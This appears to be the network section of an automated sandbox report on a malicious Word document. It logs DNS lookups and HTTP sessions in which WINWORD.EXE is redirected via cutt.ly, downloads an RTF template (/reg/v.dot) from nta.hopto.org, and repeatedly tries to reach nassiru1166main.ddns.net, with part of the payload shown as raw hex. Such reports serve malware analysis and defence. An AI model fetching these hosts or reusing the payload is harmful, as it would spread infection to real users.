May 3, 2021 14:33:02.364259005 CEST	192.168.2.22	8.8.8.8	0x3cc7	Standard query (0)	nassiru1166main.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 3, 2021 14:30:43.638731956 CEST	8.8.8.8	192.168.2.22	0x8c10	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:43.638731956 CEST	8.8.8.8	192.168.2.22	0x8c10	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:43.638731956 CEST	8.8.8.8	192.168.2.22	0x8c10	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:44.806654930 CEST	8.8.8.8	192.168.2.22	0xd372	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:44.806654930 CEST	8.8.8.8	192.168.2.22	0xd372	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:44.806654930 CEST	8.8.8.8	192.168.2.22	0xd372	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:44.881036997 CEST	8.8.8.8	192.168.2.22	0x26d4	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:44.881036997 CEST	8.8.8.8	192.168.2.22	0x26d4	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:44.881036997 CEST	8.8.8.8	192.168.2.22	0x26d4	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.292068005 CEST	8.8.8.8	192.168.2.22	0x3d77	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.292068005 CEST	8.8.8.8	192.168.2.22	0x3d77	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.292068005 CEST	8.8.8.8	192.168.2.22	0x3d77	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.353539944 CEST	8.8.8.8	192.168.2.22	0x4466	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.353539944 CEST	8.8.8.8	192.168.2.22	0x4466	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.353539944 CEST	8.8.8.8	192.168.2.22	0x4466	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.691752911 CEST	8.8.8.8	192.168.2.22	0x8fbf	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.691752911 CEST	8.8.8.8	192.168.2.22	0x8fbf	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.691752911 CEST	8.8.8.8	192.168.2.22	0x8fbf	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.745992899 CEST	8.8.8.8	192.168.2.22	0xb195	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.745992899 CEST	8.8.8.8	192.168.2.22	0xb195	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:48.745992899 CEST	8.8.8.8	192.168.2.22	0xb195	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:49.478705883 CEST	8.8.8.8	192.168.2.22	0x9b62	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:49.478705883 CEST	8.8.8.8	192.168.2.22	0x9b62	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:49.478705883 CEST	8.8.8.8	192.168.2.22	0x9b62	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:49.544231892 CEST	8.8.8.8	192.168.2.22	0x5da7	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
May 3, 2021 14:30:49.544231892 CEST	8.8.8.8	192.168.2.22	0x5da7	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
May 3, 2021 14:30:49.544231892 CEST	8.8.8.8	192.168.2.22	0x5da7	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
May 3, 2021 14:31:00.288012981 CEST	8.8.8.8	192.168.2.22	0x7a5f	No error (0)	nta.hopto.org		172.245.45.28	A (IP address)	IN (0x0001)
May 3, 2021 14:31:02.031037092 CEST	8.8.8.8	192.168.2.22	0x1175	No error (0)	nta.hopto.org		172.245.45.28	A (IP address)	IN (0x0001)
May 3, 2021 14:31:02.093127966 CEST	8.8.8.8	192.168.2.22	0x1175	No error (0)	nta.hopto.org		172.245.45.28	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.094225883 CEST	8.8.8.8	192.168.2.22	0xc5e4	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.146703959 CEST	8.8.8.8	192.168.2.22	0xc5e4	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.292517900 CEST	8.8.4.4	192.168.2.22	0x128	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.350156069 CEST	8.8.4.4	192.168.2.22	0x128	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:26.485254049 CEST	8.8.8.8	192.168.2.22	0x7316	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:30.611386061 CEST	8.8.8.8	192.168.2.22	0xfefc	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:30.671408892 CEST	8.8.8.8	192.168.2.22	0xfefc	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:30.852699995 CEST	8.8.4.4	192.168.2.22	0x170d	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:30.910312891 CEST	8.8.4.4	192.168.2.22	0x170d	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:31.081715107 CEST	8.8.8.8	192.168.2.22	0x8b6a	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:31.142422915 CEST	8.8.8.8	192.168.2.22	0x8b6a	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.245433092 CEST	8.8.8.8	192.168.2.22	0xaa9	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.305705070 CEST	8.8.8.8	192.168.2.22	0xaa9	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.359662056 CEST	8.8.8.8	192.168.2.22	0xaa9	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.502801895 CEST	8.8.4.4	192.168.2.22	0xf916	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.571302891 CEST	8.8.8.8	192.168.2.22	0x73e	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:35.631576061 CEST	8.8.8.8	192.168.2.22	0x73e	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:55.502285004 CEST	8.8.8.8	192.168.2.22	0x1088	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:55.583230972 CEST	8.8.4.4	192.168.2.22	0xc350	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:55.634183884 CEST	8.8.4.4	192.168.2.22	0xc350	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:55.747109890 CEST	8.8.8.8	192.168.2.22	0xf228	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:59.856592894 CEST	8.8.8.8	192.168.2.22	0x37c6	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:59.938287020 CEST	8.8.4.4	192.168.2.22	0x7455	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:31:59.987391949 CEST	8.8.4.4	192.168.2.22	0x7455	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:00.101639986 CEST	8.8.8.8	192.168.2.22	0xd113	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:04.259260893 CEST	8.8.8.8	192.168.2.22	0x73e1	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:04.460850954 CEST	8.8.4.4	192.168.2.22	0x6e31	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:04.570106030 CEST	8.8.8.8	192.168.2.22	0x4326	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.569761992 CEST	8.8.8.8	192.168.2.22	0x1dc8	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.619604111 CEST	8.8.8.8	192.168.2.22	0x1dc8	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.709963083 CEST	8.8.4.4	192.168.2.22	0xc782	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.758923054 CEST	8.8.4.4	192.168.2.22	0xc782	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:24.861840010 CEST	8.8.8.8	192.168.2.22	0x38f6	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:28.957312107 CEST	8.8.8.8	192.168.2.22	0x9fed	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:29.017015934 CEST	8.8.8.8	192.168.2.22	0x9fed	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:29.125664949 CEST	8.8.4.4	192.168.2.22	0x9ac3	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:29.183082104 CEST	8.8.8.8	192.168.2.22	0xea48	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:29.240221977 CEST	8.8.8.8	192.168.2.22	0xea48	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.322829962 CEST	8.8.8.8	192.168.2.22	0x6d95	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.437680960 CEST	8.8.4.4	192.168.2.22	0x6d27	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.496556997 CEST	8.8.8.8	192.168.2.22	0x5492	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.554649115 CEST	8.8.8.8	192.168.2.22	0x5492	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:33.607965946 CEST	8.8.8.8	192.168.2.22	0x5492	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:53.500072002 CEST	8.8.8.8	192.168.2.22	0x3676	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:53.648964882 CEST	8.8.4.4	192.168.2.22	0x6916	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:53.710784912 CEST	8.8.8.8	192.168.2.22	0x42ca	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:53.760754108 CEST	8.8.8.8	192.168.2.22	0x42ca	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:57.858542919 CEST	8.8.8.8	192.168.2.22	0xe654	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:57.912311077 CEST	8.8.8.8	192.168.2.22	0xe654	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:57.996078968 CEST	8.8.4.4	192.168.2.22	0x6ce3	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:58.061749935 CEST	8.8.8.8	192.168.2.22	0xad7d	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:32:58.110945940 CEST	8.8.8.8	192.168.2.22	0xad7d	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:33:02.207108974 CEST	8.8.8.8	192.168.2.22	0xbb22	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:33:02.300600052 CEST	8.8.4.4	192.168.2.22	0xab6e	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:33:02.363727093 CEST	8.8.8.8	192.168.2.22	0x3cc7	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)
May 3, 2021 14:33:02.414501905 CEST	8.8.8.8	192.168.2.22	0x3cc7	Name error (3)	nassiru1166main.ddns.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

nta.hopto.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49169	172.67.8.238	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 14:30:49.586380005 CEST	361	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cutt.ly
May 3, 2021 14:30:49.716311932 CEST	362	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 03 May 2021 12:30:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d30cfa03a3b47bc85e62aef3fa45429c61620045049; expires=Wed, 02-Jun-21 12:30:49 GMT; path=/; domain=.cutt.ly; HttpOnly; SameSite=Lax Location: https://cutt.ly/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 09d3cec7130000dffbc503e000000001 Server: cloudflare CF-RAY: 649980b81d74dffb-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 32 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f Data Ascii: 2b4<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49170	172.67.8.238	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 14:30:50.060637951 CEST	435	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 03 May 2021 12:30:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://cutt.ly/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 09d3cec873000017627835f000000001 Server: cloudflare CF-RAY: 649980ba5bec1762-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 32 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 2b4<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49174	172.245.45.28	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 14:31:00.503699064 CEST	706	OUT	GET /reg/v.dot HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: nta.hopto.org
May 3, 2021 14:31:00.715504885 CEST	707	IN	HTTP/1.1 200 OK Date: Mon, 03 May 2021 12:31:00 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 Last-Modified: Sun, 02 May 2021 12:57:13 GMT ETag: "33a9-5c1586245fb40" Accept-Ranges: bytes Content-Length: 13225 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 3b 5e 3f 2e 2b 32 34 3f 3f 3f 33 40 7c a7 5d 3e 23 5d 24 2a 37 5e 25 23 3c 37 2b 3c 7e 32 5e 3e 3f a7 7e 39 28 b5 3f 3f 3f 37 26 29 3b 3f 3f 2f 5f 38 27 33 2c b0 33 60 60 3f 25 3a 3a b5 7c b5 30 25 35 7e 32 5b 3f 5e 3f 39 31 2a 3f 2e 5d b0 3d 26 24 2d 23 b5 3a 5b b0 3d 3d 3a 2c 7e 5e 39 3f 28 5b 5d 60 24 31 3c 2c 36 21 3c 26 3d 40 b0 27 b5 5f 5f 30 38 3f b5 5f 5e 2f b0 3f 7e b5 36 3b b0 3f 3f 25 2d 35 3c 3f 2a 2d 3f 35 2c 2e 37 33 2b 26 3f 25 25 5b 2e 25 32 2e 27 7c 2e 3f 3a 60 3f 40 2e 26 25 37 23 3f b5 27 3f 3e b0 26 31 a7 3d 3f 2f 2f 30 25 28 21 3d 5d 3b 35 24 3f 28 3f 30 36 7e 5b 34 3d 2a 5f 24 3b 2a 3d 30 5b b0 24 21 b0 3f 3e 60 7c 5f 30 3b 3c 2c 38 3f 34 38 3c 3f 32 30 40 2c 39 34 7c 5b 34 2f 2e 3a 37 b5 3f 3f 21 3c 25 25 3e 25 31 36 5b 2e 3b b0 2b b5 60 23 35 5e 2c 33 b5 38 5b 7c 2c 5b 3f 3c 40 3a 37 27 3f 3f 5b 37 3f 40 34 b5 2c 7e 3f 7c 2f 2c 2e 39 3f 2e 3f 33 2d 40 24 31 3f 26 7e 29 26 3e 36 2d 5d 2d 7c 3f 23 34 38 3f b0 33 5d 3c 3d 35 33 3d 2f 2a a7 2a 37 a7 29 3a 2a 3a 33 b0 33 36 7e 2f a7 2b 32 3f 21 31 34 60 30 5f 5f 3c 26 2a 3f 3a 2b 7e 28 a7 32 b5 40 35 2c 21 3e 26 25 7e 2a 30 2a 2b 3f 7e b5 5f 27 39 2b 2a 5f 38 3a 23 31 3f 3f 3f 7e 7c 27 5e 2d 3a 39 21 23 2b 2e 32 3d 3f 37 40 21 34 35 3e 3b 5d 2e 25 37 28 2d a7 21 5b 2e 39 33 36 3f b5 25 7e a7 2b 27 21 5f 3f 40 7e 3b 34 3f b0 21 25 5f b5 2c 40 28 25 33 2d 26 2a b0 35 36 2e 25 3d 39 b5 2c 3f 5b 5f 27 5f 3f 40 3f 2a 2a 7c 38 2b 3a 37 2d 28 2c 5f 3c 3b 23 2b 26 30 5d 34 5f 3f 2e 3e 33 2e 23 2d 39 35 3a 32 3d 24 3f 3b 3b 36 30 35 23 23 3d 33 3f 2e 3f 26 3e 2c 3b 30 31 b5 40 34 60 5d 27 3d 5b 25 2a 30 27 3f 2c 3f 7e 2c 2e 25 23 25 60 2a 2a 29 32 2d 2a 29 3f 3e a7 3f 3f 3f 40 7e 3d 3a 32 3e 2e 5f 2e 26 3a 40 b5 25 b0 a7 2e 37 3d b5 2c 29 3f 31 29 a7 60 3f 3f 32 3e 38 31 21 5e 32 2b 35 2f 27 25 2b 3d 3c a7 5f 3b 7c 27 32 31 25 60 25 35 39 25 a7 2f 33 3f a7 2b 2c 5d 2b 3d 2c 7e 3f 3f 33 32 25 25 60 27 32 21 5d 5d 5b 3c 3f 25 2e 3f 3f b5 27 a7 28 3f 39 3a 25 5b 3d 36 b0 3a 28 3e 3f a7 40 3a 5f 3e 26 b0 33 b5 23 26 60 3f 7c 5d 3e 21 3c 3f 2a 33 2e 36 25 3c 28 3f 5f 7e 31 2c b0 2f 2c 2f 2f 27 35 2b 40 21 60 26 2d a7 21 3d 21 32 21 23 5e 3b 3e 33 37 40 2d 2e 3b 2e 21 3f 2a 29 2a 30 3b 5e 3b 7c 30 29 3a 38 35 21 3f 3a 7c 24 3f 7e 5d 23 3f 34 5f a7 60 24 5e b5 29 34 3f 26 3d 30 5d 3f 3f 2a 2c 25 a7 3f a7 3c 7e 36 7c 38 3e 3b 3a 2b 3d 3e 3f 29 2b 32 32 2e 5d 25 2f 3e 3f 32 32 7c 21 3c 29 36 60 3a 5d 3f 28 3f 5f 25 3e 33 32 21 2a 5f b0 5b 2c 2c 3c 2d 26 2e 3f 7e 37 3c 30 26 26 5d 3f 25 26 5e 30 b5 32 21 25 3e 37 2b 3f 3f 3a 2c 25 3f 24 b5 5b 26 5d 5b 3f 3c 2b 25 5f 2d 3f 33 26 25 34 3c 37 3f 2f 27 25 2e 23 29 2d 24 28 3f 39 34 